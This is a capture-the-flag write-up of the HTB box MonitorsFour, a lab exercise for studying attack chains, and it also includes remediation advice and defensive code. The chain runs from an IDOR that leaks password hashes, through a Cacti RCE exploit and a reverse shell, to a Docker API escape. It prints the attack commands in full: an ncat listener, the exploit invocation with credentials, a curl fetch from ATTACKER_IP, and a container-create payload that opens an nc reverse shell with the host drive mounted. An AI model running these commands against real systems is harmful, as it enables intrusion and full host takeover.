HTB MonitorsFour: IDOR to RCE to Docker Escape
Non-retired HTB box. Enter the password to read the writeup.
Introduction
MonitorsFour is an Easy Windows machine (running Docker Desktop) that chains an unauthenticated IDOR leaking unsalted MD5 password hashes, an authenticated Cacti RCE (CVE-2025-24367), and a container escape through a Docker Engine API exposed without authentication on port 2375.
Attack Overview
```text
IDOR /user?token=0
 │
 └─► Full DB dump (MD5 hashes)
 │
 └─► Hash crack → Marcus:wonderful1
 │
 └─► Cacti login (v1.2.28)
 │
 └─► CVE-2025-24367 → RCE (www-data in Docker)
 │
 └─► deepce.sh → Docker API :2375 exposed
 │
 └─► Malicious container (alpine)
 │
 └─► Bind mount C:\ → root shell
```
Reconnaissance
Nmap scan shows only port 80 open:
nmap -sS -sV -sC 10.129.51.39
PORT STATE SERVICE VERSION
80/tcp open tcpwrapped
Add the main domain:
echo "10.129.51.39 monitorsfour.htb" | sudo tee -a /etc/hosts
VHost Enumeration
ffuf -w SecLists/Discovery/DNS/subdomains-top1million-20000.txt \
-H "Host: FUZZ.monitorsfour.htb" \
-u http://monitorsfour.htb
Result: cacti (Status 302). Add cacti.monitorsfour.htb to /etc/hosts.
Directory Enumeration
ffuf -w /usr/share/seclists/Discovery/Web-Content/DirBuster-2007_directory-list-lowercase-2.3-medium.txt \
-u http://monitorsfour.htb/FUZZ \
-e .php,.html,.txt,.bak,.js -v -ic -c
Notable endpoints: /login, /contact, /user, /forgot-password.
Foothold – IDOR on /user
The /contact endpoint leaks a PHP error revealing the server path:
Warning: include(/var/www/app/views/contact.php): Failed to open stream
in /var/www/app/Router.php on line 110
Hitting /user returns:
{"error":"Missing token parameter"}
Testing with token=0:
GET /user?token=0 HTTP/1.1
Host: monitorsfour.htb
Response contains a full user database dump:
```json
[
  {
    "id": 2,
    "username": "admin",
    "password": "56b32eb43e6f15395f6c46c1c9e1cd36",
    "role": "super user",
    "token": "8024b78f83f102da4f",
    "name": "Marcus Higgins",
    "position": "System Administrator"
  },
  {
    "id": 5,
    "username": "mwatson",
    "password": "69196959c16b26ef00b77d82cf6eb169",
    "role": "user"
  }
]
```
The token value is never checked against an authenticated session: any value (here 0) returns every user record, password hashes included. This is an IDOR vulnerability.
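A hardened version of the /user lookup, added here as an illustration and not the box's actual source: the record is selected by the authenticated session and the token only confirms it, and password hashes are never serialised. The in-memory USERS table, the second user's token and the handler name are assumptions.

```python
import hmac

# Constructed sample rows shaped like the dump above; password hashes are placeholders.
USERS = {
    2: {"id": 2, "username": "admin", "password": "<md5-hash>", "role": "super user",
        "token": "8024b78f83f102da4f", "name": "Marcus Higgins",
        "position": "System Administrator"},
    5: {"id": 5, "username": "mwatson", "password": "<md5-hash>", "role": "user",
        "token": "constructed-token-for-mwatson"},
}

# Only these fields may ever leave the server; password hashes and tokens are not among them.
PUBLIC_FIELDS = ("id", "username", "role", "name", "position")


def user_endpoint(session_user_id, token):
    """Hardened /user handler (hypothetical). Returns (HTTP status, JSON body).

    The record is chosen by the authenticated session, not by the client-supplied
    token; the token is then compared against that user's stored token only."""
    if session_user_id is None or session_user_id not in USERS:
        return 401, {"error": "Authentication required"}
    if not isinstance(token, str) or not token:
        return 400, {"error": "Missing token parameter"}
    row = USERS[session_user_id]
    # Constant-time comparison; a wrong token can never yield another user's record.
    if not hmac.compare_digest(row["token"].encode(), token.encode()):
        return 403, {"error": "Forbidden"}
    return 200, {k: row[k] for k in PUBLIC_FIELDS if k in row}


if __name__ == "__main__":
    print(user_endpoint(None, "0"))                # anonymous request: 401
    print(user_endpoint(2, "0"))                   # token=0 from a logged-in user: 403
    print(user_endpoint(2, "8024b78f83f102da4f"))  # own record, without the hash
```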
Hash Cracking
The admin hash (56b32eb43e6f15395f6c46c1c9e1cd36) is MD5, no salt. It cracks instantly:
56b32eb43e6f15395f6c46c1c9e1cd36 → wonderful1
The login page at monitorsfour.htb does not accept the credentials, but the Cacti vhost (cacti.monitorsfour.htb) accepts Marcus:wonderful1.
Initial Access – CVE-2025-24367 (Cacti RCE)
Cacti version 1.2.28 is vulnerable to CVE-2025-24367, an authenticated remote code execution via arbitrary file write.
Start a listener:
ncat -lvnp 4444
Using a public PoC targeting the Cacti instance with Marcus:wonderful1:
python3 exploit.py -u http://cacti.monitorsfour.htb/ -U Marcus -P wonderful1 -l 10.10.14.181 -p 4444
A reverse shell is received as www-data inside a Docker container (ID 821fbd6a43fa).
User Flag
cat /home/marcus/user.txt
[redacted]
Privilege Escalation – Docker Engine API Escape
Container Enumeration with deepce.sh
Upload and run deepce.sh:
curl -o /tmp/deepce.sh http://ATTACKER_IP/deepce.sh
chmod +x /tmp/deepce.sh
/tmp/deepce.sh
Key findings:
- Inside Docker container.
- Container ID: 821fbd6a43fa.
- Host IP: 172.18.0.1.
- Kernel: 6.6.87.2-microsoft-standard-WSL2 (Windows host running Docker Desktop).
- Docker API exposed unauthenticated on 192.168.65.7:2375.
- Dangerous capabilities present (cap_chown, cap_dac_override, cap_fowner, cap_setuid, cap_net_raw).
The exposed Docker Engine API allows container management without authentication.
Docker API Abuse
Enumerate available images:
curl http://192.168.65.7:2375/images/json
alpine:latest is available locally.
Create a new container with host networking that bind-mounts the Windows host C:\ drive (exposed by Docker Desktop under /run/desktop/mnt/host/c/):
```bash
curl -X POST -H "Content-Type: application/json" \
  -d '{
    "Image": "alpine:latest",
    "Cmd": ["/bin/sh", "-c", "nc 10.10.16.181 4443 -e /bin/sh"],
    "HostConfig": {
      "NetworkMode": "host",
      "Mounts": [
        {
          "Type": "bind",
          "Source": "/run/desktop/mnt/host/c/",
          "Target": "/mnt"
        }
      ]
    }
  }' \
  http://192.168.65.7:2375/containers/create
```
Response contains the container ID.
Start the container:
curl -X POST http://192.168.65.7:2375/containers/<CONTAINER_ID>/start
Catch the reverse shell on port 4443:
# id
uid=0(root) gid=0(root) groups=0(root)
# ls /mnt
Users Windows Program Files ...
The Windows host filesystem is mounted at /mnt.
Root Flag
cat /mnt/Users/Administrator/Desktop/root.txt
[redacted]
Key Takeaways
| Vulnerability | Root Cause | Remediation |
|---|---|---|
| IDOR on /user endpoint | token parameter not validated against session | Validate user token server-side; never return sensitive data without authorization |
| Unsalted MD5 password storage | MD5 without salt is trivially cracked | Use bcrypt, Argon2, or PBKDF2 with unique salts |
| CVE-2025-24367 (Cacti RCE) | Arbitrary file write in Cacti 1.2.28 | Upgrade Cacti to patched version |
| Docker API exposed on port 2375 | No authentication or TLS on Docker Engine API | Bind API to localhost only or use TLS client certificates |
| Privileged container creation from unauthenticated API | Ability to create arbitrary containers | Restrict API access; use authorization plugins |
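The two Docker rows above can be checked on the daemon side. This is an added example, not part of the writeup, that audits a Docker daemon.json for the weak setting (plaintext TCP listener on 2375, no client certificates, no authorization plugin) beside a corrected one; the sample configs and the plugin name are constructed, and Docker Desktop's GUI toggle for exposing the daemon is not covered.

```python
import ipaddress
import json
from urllib.parse import urlsplit

# Constructed daemon.json fragments for illustration (not taken from the box).
WEAK_CONFIG = '{"hosts": ["tcp://0.0.0.0:2375", "npipe://"]}'
HARDENED_CONFIG = """{
  "hosts": ["tcp://127.0.0.1:2376", "npipe://"],
  "tlsverify": true,
  "tlscacert": "ca.pem", "tlscert": "server-cert.pem", "tlskey": "server-key.pem",
  "authorization-plugins": ["example-authz-plugin"]
}"""


def _is_loopback(hostname):
    """True for 127/8, ::1 and 'localhost'; an empty host means every interface."""
    if not hostname:
        return False
    if hostname == "localhost":
        return True
    try:
        return ipaddress.ip_address(hostname).is_loopback
    except ValueError:
        return False


def audit_daemon_config(text):
    """Return findings for a daemon.json: TCP listeners without mutual TLS,
    the legacy plaintext port 2375, and a missing authorization plugin."""
    cfg = json.loads(text)
    mutual_tls = bool(cfg.get("tlsverify"))  # tlsverify requires client certificates
    findings = []
    for host in cfg.get("hosts", []):
        url = urlsplit(host)
        if url.scheme != "tcp":
            continue  # unix:// and npipe:// are local-only transports
        if not mutual_tls and not _is_loopback(url.hostname):
            findings.append(f"CRITICAL: {host} accepts unauthenticated API calls from the network")
        elif not mutual_tls:
            findings.append(f"WARN: {host} is loopback-only but has no TLS client authentication")
        if url.port == 2375:
            findings.append(f"WARN: {host} uses the conventional plaintext port 2375")
    if not cfg.get("authorization-plugins"):
        findings.append("INFO: no authorization-plugins configured; any API client gets full control")
    return findings


if __name__ == "__main__":
    for name, cfg in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(name, audit_daemon_config(cfg) or ["no findings"])
```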
Resources
- Nmap — Port scanning and service detection
- ffuf — VHost and directory fuzzing
- deepce.sh — Docker container enumeration and escape surface mapping
- CVE-2025-24367 PoC — Cacti authenticated RCE
- Docker Engine API documentation — Container management endpoints